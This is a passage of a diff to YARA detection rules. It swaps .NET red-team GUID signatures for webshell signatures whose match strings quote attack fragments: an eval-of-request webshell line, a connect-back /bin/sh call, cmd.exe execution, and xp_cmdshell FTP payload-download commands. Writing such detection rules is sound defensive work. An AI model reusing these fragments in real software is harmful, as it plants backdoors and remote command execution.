-		$typelibguid1up = "8FB35DAB-73CD-4163-8868-C4DBCBDF0C17" ascii wide
-		$typelibguid2lo = "37845f5b-35fe-4dce-bbec-2d07c7904fb0" ascii wide
-		$typelibguid2up = "37845F5B-35FE-4DCE-BBEC-2D07C7904FB0" ascii wide
-		$typelibguid3lo = "83c453cf-0d29-4690-b9dc-567f20e63894" ascii wide
-		$typelibguid3up = "83C453CF-0D29-4690-B9DC-567F20E63894" ascii wide
-		$typelibguid4lo = "8b1f0a69-a930-42e3-9c13-7de0d04a4add" ascii wide
-		$typelibguid4up = "8B1F0A69-A930-42E3-9C13-7DE0D04A4ADD" ascii wide
-		$typelibguid5lo = "eaaeccf6-75d2-4616-b045-36eea09c8b28" ascii wide
-		$typelibguid5up = "EAAECCF6-75D2-4616-B045-36EEA09C8B28" ascii wide
-		$typelibguid6lo = "5b2ec674-0aa4-4209-94df-b6c995ad59c4" ascii wide
-		$typelibguid6up = "5B2EC674-0AA4-4209-94DF-B6C995AD59C4" ascii wide
-		$typelibguid7lo = "e2cc7158-aee6-4463-95bf-fb5295e9e37a" ascii wide
-		$typelibguid7up = "E2CC7158-AEE6-4463-95BF-FB5295E9E37A" ascii wide
-		$typelibguid8lo = "d04ecf62-6da9-4308-804a-e789baa5cc38" ascii wide
-		$typelibguid8up = "D04ECF62-6DA9-4308-804A-E789BAA5CC38" ascii wide
-		$typelibguid9lo = "8026261f-ac68-4ccf-97b2-3b55b7d6684d" ascii wide
-		$typelibguid9up = "8026261F-AC68-4CCF-97B2-3B55B7D6684D" ascii wide
-		$typelibguid10lo = "212cdfac-51f1-4045-a5c0-6e638f89fce0" ascii wide
-		$typelibguid10up = "212CDFAC-51F1-4045-A5C0-6E638F89FCE0" ascii wide
-		$typelibguid11lo = "c1b608bb-7aed-488d-aa3b-0c96625d26c0" ascii wide
-		$typelibguid11up = "C1B608BB-7AED-488D-AA3B-0C96625D26C0" ascii wide
-		$typelibguid12lo = "4c84e7ec-f197-4321-8862-d5d18783e2fe" ascii wide
-		$typelibguid12up = "4C84E7EC-F197-4321-8862-D5D18783E2FE" ascii wide
-		$typelibguid13lo = "3fc17adb-67d4-4a8d-8770-ecfd815f73ee" ascii wide
-		$typelibguid13up = "3FC17ADB-67D4-4A8D-8770-ECFD815F73EE" ascii wide
-		$typelibguid14lo = "f1ab854b-6282-4bdf-8b8b-f2911a008948" ascii wide
-		$typelibguid14up = "F1AB854B-6282-4BDF-8B8B-F2911A008948" ascii wide
-		$typelibguid15lo = "aef6547e-3822-4f96-9708-bcf008129b2b" ascii wide
-		$typelibguid15up = "AEF6547E-3822-4F96-9708-BCF008129B2B" ascii wide
-		$typelibguid16lo = "a336f517-bca9-465f-8ff8-2756cfd0cad9" ascii wide
-		$typelibguid16up = "A336F517-BCA9-465F-8FF8-2756CFD0CAD9" ascii wide
-		$typelibguid17lo = "5de018bd-941d-4a5d-bed5-fbdd111aba76" ascii wide
-		$typelibguid17up = "5DE018BD-941D-4A5D-BED5-FBDD111ABA76" ascii wide
-		$typelibguid18lo = "bbfac1f9-cd4f-4c44-af94-1130168494d0" ascii wide
-		$typelibguid18up = "BBFAC1F9-CD4F-4C44-AF94-1130168494D0" ascii wide
-		$typelibguid19lo = "1c79cea1-ebf3-494c-90a8-51691df41b86" ascii wide
-		$typelibguid19up = "1C79CEA1-EBF3-494C-90A8-51691DF41B86" ascii wide
-		$typelibguid20lo = "927104e1-aa17-4167-817c-7673fe26d46e" ascii wide
-		$typelibguid20up = "927104E1-AA17-4167-817C-7673FE26D46E" ascii wide
+		$s1 = "Session.Contents.Remove(m & \"userPassword\")" fullword ascii
+		$s2 = "passWord = Encode(GetPost(\"password\"))" fullword ascii
+		$s3 = "function Command(cmd, str){" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Njrat : FILE
+rule SIGNATURE_BASE_Txt_Aspxtag : FILE
 {
 	meta:
-		description = "Detects VB.NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2140d69e-fb15-50a2-ba85-b7c8293003fb"
-		date = "2020-12-30"
-		modified = "2023-04-06"
-		reference = "https://github.com/mwsrc/njRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4463-L4487"
+		description = "Chinese Hacktool Set - Webshells - file aspxtag.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L428-L443"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "739914bf21b1ac198e904b50986e28a50e53044696dafa777149f18f024beb5e"
+		hash = "42cb272c02dbd49856816d903833d423d3759948"
+		logic_hash = "6ffeee18945cab96673e4b9efc143017d168be12b794fa26aa4a304f15ae8e13"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "5a542c1b-2d36-4c31-b039-26a88d3967da" ascii wide
-		$typelibguid0up = "5A542C1B-2D36-4C31-B039-26A88D3967DA" ascii wide
-		$typelibguid1lo = "6b07082a-9256-42c3-999a-665e9de49f33" ascii wide
-		$typelibguid1up = "6B07082A-9256-42C3-999A-665E9DE49F33" ascii wide
-		$typelibguid2lo = "c0a9a70f-63e8-42ca-965d-73a1bc903e62" ascii wide
-		$typelibguid2up = "C0A9A70F-63E8-42CA-965D-73A1BC903E62" ascii wide
-		$typelibguid3lo = "70bd11de-7da1-4a89-b459-8daacc930c20" ascii wide
-		$typelibguid3up = "70BD11DE-7DA1-4A89-B459-8DAACC930C20" ascii wide
-		$typelibguid4lo = "fc790ee5-163a-40f9-a1e2-9863c290ff8b" ascii wide
-		$typelibguid4up = "FC790EE5-163A-40F9-A1E2-9863C290FF8B" ascii wide
-		$typelibguid5lo = "cb3c28b2-2a4f-4114-941c-ce929fec94d3" ascii wide
-		$typelibguid5up = "CB3C28B2-2A4F-4114-941C-CE929FEC94D3" ascii wide
+		$s1 = "String wGetUrl=Request.QueryString[" fullword ascii
+		$s2 = "sw.Write(wget);" fullword ascii
+		$s3 = "Response.Write(\"Hi,Man 2015\"); " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 2KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Manager : FILE
+rule SIGNATURE_BASE_Txt_Php : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "eef65d2c-ddbc-50c3-a6a0-e7032a55e92d"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/TheWover/Manager"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4489-L4505"
+		description = "Chinese Hacktool Set - Webshells - file php.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "65d5c46f-006d-58f9-bb7f-0a2e1f1853bd"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L445-L461"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cb6ef79b7430f0d7892c8c2819bc0d6f9493e0c74ca475b9f82b28a6b565dfb8"
+		hash = "eaa1af4b898f44fc954b485d33ce1d92790858d0"
+		logic_hash = "ace26e7c0dca285febf6b9192cbe59cc7e55e80f2f4e1a99aba25afcbeadeec1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "dda73ee9-0f41-4c09-9cad-8215abd60b33" ascii wide
-		$typelibguid0up = "DDA73EE9-0F41-4C09-9CAD-8215ABD60B33" ascii wide
-		$typelibguid1lo = "6a0f2422-d4d1-4b7e-84ad-56dc0fd2dfc5" ascii wide
-		$typelibguid1up = "6A0F2422-D4D1-4B7E-84AD-56DC0FD2DFC5" ascii wide
+		$s1 = "$Config=$_SERVER['QUERY_STRING'];" fullword ascii
+		$s2 = "gzuncompress($_SESSION['api']),null);" ascii
+		$s3 = "sprintf('%s?%s',pack(\"H*\"," ascii
+		$s4 = "if(empty($_SESSION['api']))" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Neo_Confuserex : FILE
+rule SIGNATURE_BASE_Txt_Aspx1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d73117a6-4512-5545-a4f4-72d8cf708340"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/XenocodeRCE/neo-ConfuserEx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4507-L4521"
+		description = "Chinese Hacktool Set - Webshells - file aspx1.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L463-L477"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2394b2a7098b284b18bf9fcda6ca26b34ae0143f8bd146578cc9c2d68df0741c"
+		hash = "c5ecb8bc1d7f0e716b06107b5bd275008acaf7b7"
+		logic_hash = "20bdadd6c8b61ab14f6280f55a90f541bf65c33675f979ebe489cc3967438e15"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "e98490bb-63e5-492d-b14e-304de928f81a" ascii wide
-		$typelibguid0up = "E98490BB-63E5-492D-B14E-304DE928F81A" ascii wide
+		$s0 = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item["
+		$s1 = "],\"unsafe\");%>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 150 and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpallowedtoact : FILE
+rule SIGNATURE_BASE_Txt_Shell : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "13b7f5e0-4d34-533d-a182-b3fe7c93ca43"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/pkb1s/SharpAllowedToAct"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4523-L4537"
+		description = "Chinese Hacktool Set - Webshells - file shell.c"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3e4c5928-346e-541b-b1a8-b37d5e3abc98"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L479-L496"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "872f4d70f7cefff8c1fadbe61d858c898a259559889ca4951f5368589d28169d"
+		hash = "8342b634636ef8b3235db0600a63cc0ce1c06b62"
+		logic_hash = "020e9e6ef776a9d69939fa3dec771dc516b0184086738bab439063acca89bd76"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "dac5448a-4ad1-490a-846a-18e4e3e0cf9a" ascii wide
-		$typelibguid0up = "DAC5448A-4AD1-490A-846A-18E4E3E0CF9A" ascii wide
+		$s1 = "printf(\"Could not connect to remote shell!\\n\");" fullword ascii
+		$s2 = "printf(\"Usage: %s <reflect ip> <port>\\n\", prog);" fullword ascii
+		$s3 = "execl(shell,\"/bin/sh\",(char *)0);" fullword ascii
+		$s4 = "char shell[]=\"/bin/sh\";" fullword ascii
+		$s5 = "connect back door\\n\\n\");" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 2KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Supersqlinjectionv1 : FILE
+rule SIGNATURE_BASE_Txt_Asp : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "247bef0d-7873-51c7-97b8-1be6dfe7708d"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/shack2/SuperSQLInjectionV1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4539-L4553"
+		description = "Chinese Hacktool Set - Webshells - file asp.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "39a2ba9a-c429-574f-8820-5e0270a4b84c"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L498-L512"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8e97bf351c4c7507f3cf40a2d7aa36c60906a8069bb3644ce6ef05911a4d9a5c"
+		hash = "a63549f749f4d9d0861825764e042e299e06a705"
+		logic_hash = "9eab239310fbebe8c88cbf8d0ee4123b8f3e2ebe601949e1e984e9cfde9869e7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "d5688068-fc89-467d-913f-037a785caca7" ascii wide
-		$typelibguid0up = "D5688068-FC89-467D-913F-037A785CACA7" ascii wide
+		$s1 = "Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next:BodyCol" ascii
+		$s2 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x253c and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Adsearch : FILE
+rule SIGNATURE_BASE_Txt_Asp1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "399ea06d-b36a-542b-bccc-8e8f935a35c6"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/tomcarver16/ADSearch"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4555-L4569"
+		description = "Chinese Hacktool Set - Webshells - file asp1.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b00ab02c-c767-568c-be99-6cc731c3f1dc"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L514-L530"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a35da6c6a396669928693b7d408f7d1021a7afc41dabfe521105254d69f23474"
+		hash = "95934d05f0884e09911ea9905c74690ace1ef653"
+		logic_hash = "77a4409b852d24228b0e1701f1ccc2abe3930c2c7240a43796b23042e706d9bf"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "4da5f1b7-8936-4413-91f7-57d6e072b4a7" ascii wide
-		$typelibguid0up = "4DA5F1B7-8936-4413-91F7-57D6E072B4A7" ascii wide
+		$s1 = "if ShellPath=\"\" Then ShellPath = \"cmd.exe\"" fullword ascii
+		$s2 = "autoLoginEnable=WSHShell.RegRead(autoLoginPath & autoLoginEnableKey)" fullword ascii
+		$s3 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
+		$s4 = "szTempFile = server.mappath(\"cmd.txt\")" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 70KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Privilege_Escalation_Awesome_Scripts_Suite : FILE
+rule SIGNATURE_BASE_Txt_Php_2 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "fa218dfa-4b56-5a62-b149-63394bd0b604"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4571-L4585"
+		description = "Chinese Hacktool Set - Webshells - file php.html"
+		author = "Florian Roth (Nextron Systems)"
+		id = "66916e32-9471-54bd-944e-bb751b38d3b0"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L532-L552"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a70cfe807cbba80e0bc79adcb7268b2c9b99c20c5f7454e2275712a1adbeb16c"
+		hash = "a7d5fcbd39071e0915c4ad914d31e00c7127bcfc"
+		logic_hash = "c08f62c3d468c2ebacd10fff6aa0c63bd303d627d487c070a9d22419bf6906cd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "1928358e-a64b-493f-a741-ae8e3d029374" ascii wide
-		$typelibguid0up = "1928358E-A64B-493F-A741-AE8E3D029374" ascii wide
+		$s1 = "function connect($dbhost, $dbuser, $dbpass, $dbname='') {" fullword ascii
+		$s2 = "scookie('loginpass', '', -86400 * 365);" fullword ascii
+		$s3 = "<title><?php echo $act.' - '.$_SERVER['HTTP_HOST'];?></title>" fullword ascii
+		$s4 = "Powered by <a title=\"Build 20130112\" href=\"http://www.4ngel.net\" target=\"_b" ascii
+		$s5 = "formhead(array('title'=>'Execute Command', 'onsubmit'=>'g(\\'shell\\',null,this." ascii
+		$s6 = "secparam('IP Configurate',execute('ipconfig -all'));" fullword ascii
+		$s7 = "secparam('Hosts', @file_get_contents('/etc/hosts'));" fullword ascii
+		$s8 = "p('<p><a href=\"http://w'.'ww.4'.'ng'.'el.net/php'.'sp'.'y/pl'.'ugin/\" target=" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 100KB and 4 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2020_1206_POC : FILE
+rule SIGNATURE_BASE_Txt_Ftp : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d70472f3-b19f-5097-bd70-99a7e7812ac4"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/ZecOps/CVE-2020-1206-POC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4587-L4605"
+		description = "Chinese Hacktool Set - Webshells - file ftp.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "311de4b0-fa19-545a-8a65-a40b255b5b39"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L554-L573"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2e6ae824a98945e75cb57ee64c6622aff498201b64b7a24424990e84406176a0"
+		hash = "3495e6bcb5484e678ce4bae0bd1a420b7eb6ad1d"
+		logic_hash = "02eae9b19274ab7b816d7c336017af8f0fdd5273664eb37be92be12661f3ef1f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "3523ca04-a12d-4b40-8837-1a1d28ef96de" ascii wide
-		$typelibguid0up = "3523CA04-A12D-4B40-8837-1A1D28EF96DE" ascii wide
-		$typelibguid1lo = "d3a2f24a-ddc6-4548-9b3d-470e70dbcaab" ascii wide
-		$typelibguid1up = "D3A2F24A-DDC6-4548-9B3D-470E70DBCAAB" ascii wide
-		$typelibguid2lo = "fb30ee05-4a35-45f7-9a0a-829aec7e47d9" ascii wide
-		$typelibguid2up = "FB30EE05-4A35-45F7-9A0A-829AEC7E47D9" ascii wide
+		$s1 = "';exec master.dbo.xp_cmdshell 'echo open " ascii
+		$s2 = "';exec master.dbo.xp_cmdshell 'ftp -s:';" ascii
+		$s3 = "';exec master.dbo.xp_cmdshell 'echo get lcx.exe" ascii
+		$s4 = "';exec master.dbo.xp_cmdshell 'echo get php.exe" ascii
+		$s5 = "';exec master.dbo.xp_cmdshell 'copy " ascii
+		$s6 = "ftp -s:d:\\ftp.txt " fullword ascii
+		$s7 = "echo bye>>d:\\ftp.txt " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 2KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dinvoke : FILE
+rule SIGNATURE_BASE_Txt_Lcx : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f3b0ef47-a92c-5c5d-a9e2-09579fcb438e"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/TheWover/DInvoke"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4607-L4621"
+		description = "Chinese Hacktool Set - Webshells - file lcx.c"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4a4e8810-6dae-526e-86f0-43de45d1c87a"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L575-L592"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3fac2563205327a173814141c035c8be78d43d8409db34954ac6027b3039d7c0"
+		hash = "ddb3b6a5c5c22692de539ccb796ede214862befe"
+		logic_hash = "48121824d3173b77b54b52dc60d3422a904ada46a6ebb20bb585086911cd8360"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "b77fdab5-207c-4cdb-b1aa-348505c54229" ascii wide
-		$typelibguid0up = "B77FDAB5-207C-4CDB-B1AA-348505C54229" ascii wide
+		$s1 = "printf(\"Usage:%s -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-l" ascii
+		$s2 = "sprintf(tmpbuf2,\"\\r\\n########### reply from %s:%d ####################\\r\\n" ascii
+		$s3 = "printf(\" 3: connect to HOST1:PORT1 and HOST2:PORT2\\r\\n\");" fullword ascii
+		$s4 = "printf(\"got,ip:%s,port:%d\\r\\n\",inet_ntoa(client1.sin_addr),ntohs(client1.sin" ascii
+		$s5 = "printf(\"[-] connect to host1 failed\\r\\n\");" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 25KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpchisel : FILE
+rule SIGNATURE_BASE_Txt_Jspcmd : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3b7e6703-ebe8-5a98-839f-7d0349ab483f"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/shantanu561993/SharpChisel"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4623-L4637"
+		description = "Chinese Hacktool Set - Webshells - file jspcmd.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "53eb6caf-3578-5df7-a1d8-9e4038b6f57e"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L594-L608"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9df151164aa269c13a79d862c15cc75bd0bb4668753f282149c162bd63ece471"
+		hash = "1d4e789031b15adde89a4628afc759859e53e353"
+		logic_hash = "d2cbf753fbd9e261234e6beb6f79aecb407a368704ae09d907d128d04c242053"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "f5f21e2d-eb7e-4146-a7e1-371fd08d6762" ascii wide
-		$typelibguid0up = "F5F21E2D-EB7E-4146-A7E1-371FD08D6762" ascii wide
+		$s0 = "if(\"1752393\".equals(request.getParameter(\"Confpwd\"))){" fullword ascii
+		$s4 = "out.print(\"Hi,Man 2015\");" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpscribbles : FILE
+rule SIGNATURE_BASE_Txt_Jsp : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "47125b76-9388-5372-8810-d198f623367a"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/V1V1/SharpScribbles"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4639-L4655"
+		description = "Chinese Hacktool Set - Webshells - file jsp.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "53eb6caf-3578-5df7-a1d8-9e4038b6f57e"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L610-L626"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7b592dc541b708e001f2576d9eb412ecc52879d514149e9f211f6357faff92fc"
+		hash = "74518faf08637c53095697071db09d34dbe8d676"
+		logic_hash = "039b145031cf1127cb1b2aeda063d578d9eb151559232d7e6049965111df1e28"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "aa61a166-31ef-429d-a971-ca654cd18c3b" ascii wide
-		$typelibguid0up = "AA61A166-31EF-429D-A971-CA654CD18C3B" ascii wide
-		$typelibguid1lo = "0dc1b824-c6e7-4881-8788-35aecb34d227" ascii wide
-		$typelibguid1up = "0DC1B824-C6E7-4881-8788-35AECB34D227" ascii wide
